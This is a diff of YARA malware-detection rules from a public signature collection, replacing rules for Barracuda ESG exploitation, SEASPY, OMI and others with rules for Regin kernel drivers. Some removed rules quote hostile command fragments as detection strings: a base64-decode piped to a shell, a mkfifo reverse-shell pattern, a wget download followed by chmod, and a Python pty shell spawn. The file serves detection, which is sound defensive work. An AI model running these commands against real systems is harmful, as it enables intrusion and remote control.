+		id = "b97b20bd-f6b9-512f-ba99-6c38ba7853be"
+		date = "2015-08-08"
+		modified = "2023-12-05"
+		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cheshirecat.yar#L76-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "614a6673579630fc254d3c546161647e619df5a03ee6f21434d6cc50be1ed187"
-		score = 80
-		quality = 83
+		logic_hash = "3c5d6ce6cc09c416d3449f7f5fc09139ce9271b69d743832b4b2548682e4ddf1"
+		score = 70
+		quality = 85
 		tags = "FILE"
-		hash1 = "321ec239bfa6927d39155ef5f10741ed786219489bbbb1dc8fee66e22f9f8e80"
-		hash2 = "7aef130b19d1f940e4c4cee6efe0f190f1402d2e0f741ee605c77518a04cb6d7"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
+		hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
+		hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
+		hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
 
 	strings:
-		$x2 = "SPCK!it is a [(?riddle?) wrapped in a {mystery}] inside an <enigma>!" fullword ascii
-		$x3 = "636C7369643A46334430443336462D323346382D343638322D413139352D373443393242303344344146" fullword ascii
-		$s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii
-		$s2 = "DUMPTHIN" fullword ascii
-		$s3 = "\"C:\\WINDOWS\\system32\\" ascii
-		$s4 = "window.eval(f.decodeURIComponent(a));" fullword ascii
-		$s5 = "/tbedrs.dll" fullword ascii
-		$s6 = "NSISDL/1.2 (Mozilla)" fullword ascii
-		$s7 = "NSIS_Inetc (Mozilla)" fullword ascii
-		$s8 = "/logos.gif" fullword ascii
-		$s9 = "synflood" fullword ascii
-		$s10 = "IconFile=C:\\WINDOWS\\system32\\SHELL32.dll" fullword ascii
-		$s11 = "udpflood" fullword ascii
-		$s12 = "shellcode" fullword ascii
-		$s13 = "&PassWord=" fullword ascii
-		$s14 = "SystemPropertiesProtection.exe" fullword ascii
-		$s15 = "SystemPropertiesRemote.exe" fullword ascii
-		$c1 = "jobcall.org" ascii
-		$c2 = "sportsinfinite.com" ascii
-		$c3 = "milsatcom.us" ascii
-		$c4 = "geographicphotographer.com" ascii
-		$c5 = "snowsmooth.com" ascii
-		$c6 = "goodre.net" ascii
-		$c7 = "gloflabs.com" ascii
+		$a1 = "Interface\\%s\\info" fullword ascii
+		$a2 = "Interface\\%s\\info\\%s" fullword ascii
+		$a3 = "CLSID\\%s\\info\\%s" fullword ascii
+		$a4 = "CLSID\\%s\\info" fullword ascii
+		$b1 = "Windows Shell Icon Handler" fullword wide
+		$b2 = "Microsoft Shell Icon Handler" fullword wide
+		$s1 = "\\StringFileInfo\\%s\\FileVersion" ascii
+		$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
+		$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
+		$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
+		$s5 = "%sMutex" fullword ascii
+		$s6 = "\\ShellIconCache" ascii
+		$s7 = "+6Service Pack " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 1 of ( $c* ) ) ) or ( 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 7 of ( $s* ) and 2 of ( $a* ) and 1 of ( $b* )
 }
-rule SIGNATURE_BASE_VULN_LNX_OMI_RCE_CVE_2021_386471_Sep21 : CVE_2021_38647 FILE
+rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_A : FILE
 {
 	meta:
-		description = "Detects a Linux OMI version vulnerable to CVE-2021-38647 (OMIGOD) which enables an unauthenticated RCE"
-		author = "Christian Burkard"
-		id = "ca49f0cc-ea33-559c-bd4f-306a01315fce"
-		date = "2021-09-16"
-		modified = "2023-12-05"
-		reference = "https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_cve_2021_386471_omi.yar#L1-L37"
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		id = "4cea1d45-b797-51b2-baa7-e66c8c0206ea"
+		date = "2014-11-23"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L14-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "99fddcf763f41a08a8ef8240d544ef67b840a1b5ae709bd7efbcbcad8268e8a5"
-		score = 50
+		logic_hash = "1cc367dff184f2b458a2b7c0c88a44095714525ca6bb115d03e6331cf1f22116"
+		score = 75
 		quality = 85
-		tags = "CVE-2021-38647, FILE"
+		tags = "FILE"
+		hash1 = "187044596bc1328efa0ed636d8aa4a5c"
+		hash2 = "06665b96e293b23acc80451abb413e50"
+		hash3 = "d240f06e98c8d3e647cbf4d442d79475"
 
 	strings:
-		$a1 = "/opt/omi/bin/omiagent" ascii fullword
-		$s1 = "OMI-1.6.8-0 - " ascii
-		$s2 = "OMI-1.6.6-0 - " ascii
-		$s3 = "OMI-1.6.4-1 - " ascii
-		$s4 = "OMI-1.6.4-0 - " ascii
-		$s5 = "OMI-1.6.2-0 - " ascii
-		$s6 = "OMI-1.6.1-0 - " ascii
-		$s7 = "OMI-1.5.0-0 - " ascii
-		$s8 = "OMI-1.4.4-0 - " ascii
-		$s9 = "OMI-1.4.3-2 - " ascii
-		$s10 = "OMI-1.4.3-1 - " ascii
-		$s11 = "OMI-1.4.3-0 - " ascii
-		$s12 = "OMI-1.4.2-5 - " ascii
-		$s13 = "OMI-1.4.2-4 - " ascii
-		$s14 = "OMI-1.4.2-3 - " ascii
-		$s15 = "OMI-1.4.2-2 - " ascii
-		$s16 = "OMI-1.4.2-1 - " ascii
-		$s17 = "OMI-1.4.1-1 - " ascii
-		$s18 = "OMI-1.4.1-0 - " ascii
-		$s19 = "OMI-1.4.0-6 - " ascii
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
+		$m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+		$s0 = "atapi.sys" fullword wide
+		$s1 = "disk.sys" fullword wide
+		$s3 = "h.data" fullword ascii
+		$s4 = "\\system32" ascii
+		$s5 = "\\SystemRoot" ascii
+		$s6 = "system" fullword ascii
+		$s7 = "temp" fullword ascii
+		$s8 = "windows" fullword ascii
+		$x1 = "LRich6" fullword ascii
+		$x2 = "KeServiceDescriptorTable" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and $a1 and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and $m0 at 0 and $m1 and all of ( $s* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Line_Dancer
+rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_B : FILE
 {
 	meta:
-		description = "Targets code sections of Line Dancer, a shellcode loader targeting Cisco ASA devices."
-		author = "NCSC"
-		id = "3b49a861-8107-577a-bae1-ae28d424cc13"
-		date = "2024-04-24"
-		modified = "2024-04-29"
-		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/line/ncsc-tip-line-dancer.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_line_dancer_apr24.yar#L2-L16"
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		id = "14f31b2d-4753-54e8-891a-e28689ba57db"
+		date = "2014-11-23"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L43-L94"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "179e58274a792bc4a16787d251f5ad25de1271084323e62e153fa6d461e3c07e"
+		logic_hash = "c2dee4f94f9eefb1c11f6e86144c6bfafc0845768200f5a839ffe3dd5d38294d"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
+		hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
+		hash2 = "bfbe8c3ee78750c3a520480700e440f8"
+		hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
+		hash4 = "06665b96e293b23acc80451abb413e50"
+		hash5 = "2c8b9d2885543d7ade3cae98225e263b"
+		hash6 = "4b6b86c7fec1c574706cecedf44abded"
+		hash7 = "187044596bc1328efa0ed636d8aa4a5c"
+		hash8 = "d240f06e98c8d3e647cbf4d442d79475"
+		hash9 = "6662c390b2bbbd291ec7987388fc75d7"
+		hash10 = "1c024e599ac055312a4ab75b3950040a"
+		hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
+		hash12 = "b505d65721bb2453d5039a389113b566"
+		hash13 = "b269894f434657db2b15949641a67532"
 
 	strings:
-		$ = { 48 8D 5E 20 48 8D 3D BB FF FF FF BA 20 00 00 00 }
-		$ = { 4C 89 EE 44 89 F2 48 8D 3D 9A 27 00 00 }
-		$ = { 41 FF D7 41 5F 41 5E 41 5D 41 5C 5B 5D 48 C7 C0 01 00 00 00 5F }
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
+		$s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+		$s2 = "H.data" fullword ascii nocase
+		$s3 = "INIT" fullword ascii
+		$s4 = "ntoskrnl.exe" fullword ascii
+		$v1 = "\\system32" ascii
+		$v2 = "\\SystemRoot" ascii
+		$v3 = "KeServiceDescriptorTable" fullword ascii
+		$w1 = "\\system32" ascii
+		$w2 = "\\SystemRoot" ascii
+		$w3 = "LRich6" fullword ascii
+		$x1 = "_snprintf" ascii
+		$x2 = "_except_handler3" ascii
+		$y1 = "mbstowcs" fullword ascii
+		$y2 = "wcstombs" fullword ascii
+		$y3 = "KeGetCurrentIrql" fullword ascii
+		$z1 = "wcscpy" fullword ascii
+		$z2 = "ZwCreateFile" fullword ascii
+		$z3 = "ZwQueryInformationFile" fullword ascii
+		$z4 = "wcslen" fullword ascii
+		$z5 = "atoi" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and $m0 at 0 and all of ( $s* ) and ( all of ( $v* ) or all of ( $w* ) or all of ( $x* ) or all of ( $y* ) or all of ( $z* ) ) and filesize < 20KB
 }
-rule SIGNATURE_BASE_APT_UNC4841_ESG_Barracuda_CVE_2023_2868_Forensic_Artifacts_Jun23_1 : SCRIPT CVE_2023_2868
+rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_C : FILE
 {
 	meta:
-		description = "Detects forensic artifacts found in the exploitation of CVE-2023-2868 in Barracuda ESG devices by UNC4841"
-		author = "Florian Roth"
-		id = "50518fa1-33de-5fe5-b957-904d976fb29a"
-		date = "2023-06-15"
-		modified = "2023-06-16"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L2-L28"
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		id = "2006b3f0-abd1-5274-8b18-75368671e062"
+		date = "2014-11-23"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L96-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa7cac1e0f6cb6fa3ac271c1fff0039ff182b6859920b4eca25541457654acde"
+		logic_hash = "9454eb8b45a720fbe517caa2221fb0ceedf561902d94cabe513e921cc52fe035"
 		score = 75
 		quality = 85
-		tags = "SCRIPT, CVE-2023-2868"
+		tags = "FILE"
+		hash1 = "e0895336617e0b45b312383814ec6783556d7635"
+		hash2 = "732298fa025ed48179a3a2555b45be96f7079712"
 
 	strings:
-		$x01 = "=;ee=ba;G=s;_ech_o $abcdefg_${ee}se64" ascii
-		$x02 = ";echo $abcdefg | base64 -d | sh" ascii
-		$x03 = "setsid sh -c \"mkfifo /tmp/p" ascii
-		$x04 = "sh -i </tmp/p 2>&1" ascii
-		$x05 = "if string.match(hdr:body(), \"^[%w%+/=" ascii
-		$x06 = "setsid sh -c \"/sbin/BarracudaMailService eth0\""
-		$x07 = "echo \"set the bvp ok\""
-		$x08 = "find ${path} -type f ! -name $excludeFileNameKeyword | while read line ;"
-		$x09 = " /mail/mstore | xargs -i cp {} /usr/share/.uc/"
-		$x10 = "tar -T /mail/mstore/tmplist -czvf "
-		$sa1 = "sh -c wget --no-check-certificate http"
-		$sa2 = ".tar;chmod +x "
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
+		$s0 = "KeGetCurrentIrql" fullword ascii
+		$s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide
+		$s2 = "usbclass" fullword wide
+		$x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
+		$x2 = "Universal Serial Bus Class Driver" fullword wide
+		$x3 = "5.2.3790.0" fullword wide
+		$y1 = "LSA Shell" fullword wide
+		$y2 = "0Richw" fullword ascii
 
 	condition:
-		1 of ( $x* ) or all of ( $sa* )
+		uint16( 0 ) == 0x5a4d and $m0 at 0 and all of ( $s* ) and ( all of ( $x* ) or all of ( $y* ) ) and filesize < 20KB
 }
-rule SIGNATURE_BASE_APT_MAL_UNC4841_SEASPY_Jun23_1 : CVE_2023_2868 FILE
+rule SIGNATURE_BASE_Regin_Sig_Svcsstat : FILE
 {
 	meta:
-		description = "Detects SEASPY malware used by UNC4841 in attacks against Barracuda ESG appliances exploiting CVE-2023-2868"
-		author = "Florian Roth"
-		id = "bcff58f8-87f6-5371-8b96-5d4c0f349000"
-		date = "2023-06-16"
-		modified = "2023-12-05"
-		reference = "https://blog.talosintelligence.com/alchimist-offensive-framework/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L30-L55"
+		description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
+		author = "@MalwrSignatures"
+		id = "0cb493d7-c7f1-54c4-9805-d9894bf399da"
+		date = "2014-11-26"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L126-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c1dcb841fb872f0d5e661bfd90fca3075f5efc95b1f9dfff72fa318ed131e9d1"
-		score = 85
+		hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"
+		logic_hash = "2b1fdc2cc8c0aedaf749ee0e87a8853b91735a4e215c65df221a930d4b1d02f7"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-2868, FILE"
-		hash1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
+		tags = "FILE"
 
 	strings:
-		$sx1 = "usage: ./BarracudaMailService <Network-Interface>. e.g.: ./BarracudaMailService eth0" ascii fullword
-		$s1 = "fcntl.tmp.amd64." ascii
-		$s2 = "Child process id:%d" ascii fullword
-		$s3 = "[*]Success!" ascii fullword
-		$s4 = "NO port code" ascii
-		$s5 = "enter open tty shell" ascii
-		$op1 = { 48 89 c6 f3 a6 0f 84 f7 01 00 00 bf 6c 84 5f 00 b9 05 00 00 00 48 89 c6 f3 a6 0f 84 6a 01 00 00 }
-		$op2 = { f3 a6 0f 84 d2 00 00 00 48 89 de bf 51 5e 61 00 b9 05 00 00 00 f3 a6 74 21 48 89 de }
-		$op3 = { 72 de 45 89 f4 e9 b8 f4 ff ff 48 8b 73 08 45 85 e4 ba 49 3d 62 00 b8 44 81 62 00 48 0f 45 d0 }
+		$s0 = "Service Control Manager" fullword ascii
+		$s1 = "_vsnwprintf" ascii
+		$s2 = "Root Agency" fullword ascii
+		$s3 = "Root Agency0" fullword ascii
+		$s4 = "StartServiceCtrlDispatcherA" fullword ascii
+		$s5 = "\\\\?\\UNC" fullword wide
+		$s6 = "%ls%ls" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 9000KB and 3 of them or 5 of them
+		all of them and filesize < 15KB and filesize > 10KB
 }
-rule SIGNATURE_BASE_APT_MAL_UNC4841_SEASPY_LUA_Jun23_1 : FILE
+rule SIGNATURE_BASE_Regin_Sample_1 : FILE
 {
 	meta:
-		description = "Detects SEASPY malware related LUA script"
+		description = "Semiautomatically generated YARA rule - file-3665415_sys"
 		author = "Florian Roth"
-		id = "a44861d0-107e-589b-8cf1-3fbc2f5c78dc"
-		date = "2023-06-16"
-		modified = "2023-12-05"
-		reference = "https://blog.talosintelligence.com/alchimist-offensive-framework/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L57-L74"
+		id = "13478652-155f-52ba-af16-53f27c92e052"
+		date = "2014-11-25"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L145-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f78823a4ba9e025ba4833a2d5234c7baba33c1167c0247f13b8b2baa430aa4e5"
-		score = 90
+		hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"
+		logic_hash = "e8291b4a68924dccdd825ee2cc8930acb794e92e0302598872ec78eb0bf8504f"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "56e8066bf83ff6fe0cec92aede90f6722260e0a3f169fc163ed88589bffd7451"
 
 	strings:
-		$x1 = "os.execute('rverify'..' /tmp/'..attachment:filename())" ascii fullword
-		$x2 = "log.debug(\"--- opening archive [%s], mimetype [%s]\", tmpfile" ascii fullword
-		$xe1 = "os.execute('rverify'..' /tmp/'..attachment:filename())" ascii base64
-		$xe2 = "log.debug(\"--- opening archive [%s], mimetype [%s]\", tmpfile" ascii base64
+		$s0 = "Getting PortName/Identifier failed - %x" fullword ascii
+		$s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii
+		$s2 = "External Naming Failed - Status %x" fullword ascii
+		$s3 = "------- Same multiport - different interrupts" fullword ascii
+		$s4 = "%x occurred prior to the wait - starting the" fullword ascii
+		$s5 = "'user registry info - userPortIndex: %d" fullword ascii
+		$s6 = "Could not report legacy device - %x" fullword ascii
+		$s7 = "entering SerialGetPortInfo" fullword ascii
+		$s8 = "'user registry info - userPort: %x" fullword ascii
+		$s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii
+		$s10 = "Kernel debugger is using port at address %X" fullword ascii
+		$s12 = "Release - freeing multi context" fullword ascii
+		$s13 = "Serial driver will not load port" fullword ascii
+		$s14 = "'user registry info - userAddressSpace: %d" fullword ascii
+		$s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii
+		$s20 = "'user registry info - userIndexed: %d" fullword ascii
+		$fp1 = "Enter SerialBuildResourceList" ascii fullword
 
 	condition:
-		filesize < 500KB and 1 of them
+		all of them and filesize < 110KB and filesize > 80KB and not $fp1
 }
-rule SIGNATURE_BASE_APT_HKTL_Proxy_Tool_Jun23_1 : FILE
+rule SIGNATURE_BASE_Regin_Sample_2 : FILE
 {
 	meta:
-		description = "Detects agent used as proxy tool in UNC4841 intrusions - possibly Alchemist C2 framework implant"
-		author = "Florian Roth"
-		id = "0e406737-3083-53c2-a6d2-14c07794125a"
-		date = "2023-06-16"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L76-L101"
+		description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
+		author = "@MalwrSignatures"
+		id = "1091a598-e964-5f67-9267-531d66831bee"
+		date = "2014-11-26"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L176-L203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7e2152e1aa74e1842519e2eecd2acd3ef8eb8d517f3c0ef9f05c983616f223c3"
+		hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"
+		logic_hash = "a11d03d10661c1fc094450b250056196e5d8d16bd171eba9e37c7524aa2301d2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "ca72fa64ed0a9c22d341a557c6e7c1b6a7264b0c4de0b6f717dd44bddf550bca"
-		hash2 = "57e4b180fd559f15b59c43fb3335bd59435d4d76c4676e51a06c6b257ce67fb2"
 
 	strings:
-		$a2 = "/src/runtime/panic.go"
-		$s1 = "main.handleClientRequest" ascii fullword
-		$s2 = "main.sockIP.toAddr" ascii fullword
+		$s0 = "\\SYSTEMROOT\\system32\\lsass.exe" wide
+		$s1 = "atapi.sys" fullword wide
+		$s2 = "disk.sys" fullword wide
+		$s3 = "IoGetRelatedDeviceObject" fullword ascii
+		$s4 = "HAL.dll" fullword ascii
+		$s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" ascii
+		$s6 = "PsGetCurrentProcessId" fullword ascii
+		$s7 = "KeGetCurrentIrql" fullword ascii
+		$s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+		$s9 = "KeSetImportanceDpc" fullword ascii
+		$s10 = "KeQueryPerformanceCounter" fullword ascii
+		$s14 = "KeInitializeEvent" fullword ascii
+		$s15 = "KeDelayExecutionThread" fullword ascii
+		$s16 = "KeInitializeTimerEx" fullword ascii
+		$s18 = "PsLookupProcessByProcessId" fullword ascii
+		$s19 = "ExReleaseFastMutexUnsafe" fullword ascii
+		$s20 = "ExAcquireFastMutexUnsafe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 or uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xbebafeca ) and filesize < 10MB and all of them
+		all of them and filesize < 40KB and filesize > 30KB
 }
-rule SIGNATURE_BASE_SUSP_Fscan_Port_Scanner_Output_Jun23 : SCRIPT FILE
+rule SIGNATURE_BASE_Regin_Sample_3 : FILE
 {
 	meta:
-		description = "Detects output generated by the command line port scanner FScan"
-		author = "Florian Roth"
-		id = "7eb4b27f-0c5b-5d7e-b759-95d7894d5822"
-		date = "2023-06-15"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L103-L117"
+		description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
+		author = "@Malwrsignatures"
+		id = "eefc174f-4b17-5c90-8478-3eaaf80e9a78"
+		date = "2014-11-27"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L205-L230"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "49b5055c96d7b7446ee5ae8667a5aa3645f0f98d8b5f2bffcd6ef3b20bc64e05"
-		score = 70
+		hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
+		logic_hash = "5a0f77f203765f7737c00c3df760ea7f3ed354559aad07f3053173ff09e1ce1a"
+		score = 75
 		quality = 85
-		tags = "SCRIPT, FILE"
+		tags = "FILE"
 
 	strings:
-		$s1 = "[*] NetInfo:" ascii
-		$s2 = ":443 open" ascii
-		$s3 = "   [->]"
+		$s0 = "Service Pack x" fullword wide
+		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" wide
+		$s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" wide
+		$s3 = "mntoskrnl.exe" fullword wide
+		$s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" wide
+		$s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
+		$s6 = "Service Pack" fullword wide
+		$s7 = ".sys" fullword wide
+		$s8 = ".dll" fullword wide
+		$s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" wide
+		$s11 = "IoGetRelatedDeviceObject" fullword ascii
+		$s12 = "VMEM.sys" fullword ascii
+		$s13 = "RtlGetVersion" fullword wide
+		$s14 = "ntkrnlpa.exe" fullword ascii
 
 	condition:
-		filesize < 800KB and all of them
+		uint32( 0 ) == 0xfedcbafe and all of ( $s* ) and filesize > 160KB and filesize < 200KB
 }
-rule SIGNATURE_BASE_SUSP_PY_Shell_Spawn_Jun23_1 : SCRIPT
+rule SIGNATURE_BASE_Regin_Sample_Set_2 : FILE
 {
 	meta:
-		description = "Detects suspicious one-liner to spawn a shell using Python"
-		author = "Florian Roth"
-		id = "15fd2c9a-c425-5d4d-9209-fd3826074d6c"
-		date = "2023-06-15"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L119-L131"
+		description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
+		author = "@MalwrSignatures"
+		id = "0b21091d-413e-54dd-83d1-5d824fb013f2"
+		date = "2014-11-26"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L232-L264"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "63e94447930d5a00399de753076facbfb2bf18dd8c815f01aaefd14678aea034"
-		score = 70
-		quality = 85
-		tags = "SCRIPT"
+		logic_hash = "26125cea704532cbc22df46af228299ae810bce60938bee7b067ed273158d76f"
+		score = 75
+		quality = 83
+		tags = "FILE"
+		hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
+		hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"
 
 	strings:
-		$x1 = "python -c import pty;pty.spawn(\"/bin/" ascii
+		$s0 = "HAL.dll" fullword ascii
+		$s1 = "IoGetDeviceObjectPointer" fullword ascii
+		$s2 = "MaximumPortsServiced" fullword wide
+		$s3 = "KeGetCurrentIrql" fullword ascii
+		$s4 = "ntkrnlpa.exe" fullword ascii
+		$s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+		$s6 = "ConnectMultiplePorts" fullword wide
+		$s7 = "\\SYSTEMROOT" wide
+		$s8 = "IoWriteErrorLogEntry" fullword ascii
+		$s9 = "KeQueryPerformanceCounter" fullword ascii
+		$s10 = "KeServiceDescriptorTable" fullword ascii
+		$s11 = "KeRemoveEntryDeviceQueue" fullword ascii
+		$s12 = "SeSinglePrivilegeCheck" fullword ascii
+		$s13 = "KeInitializeEvent" fullword ascii
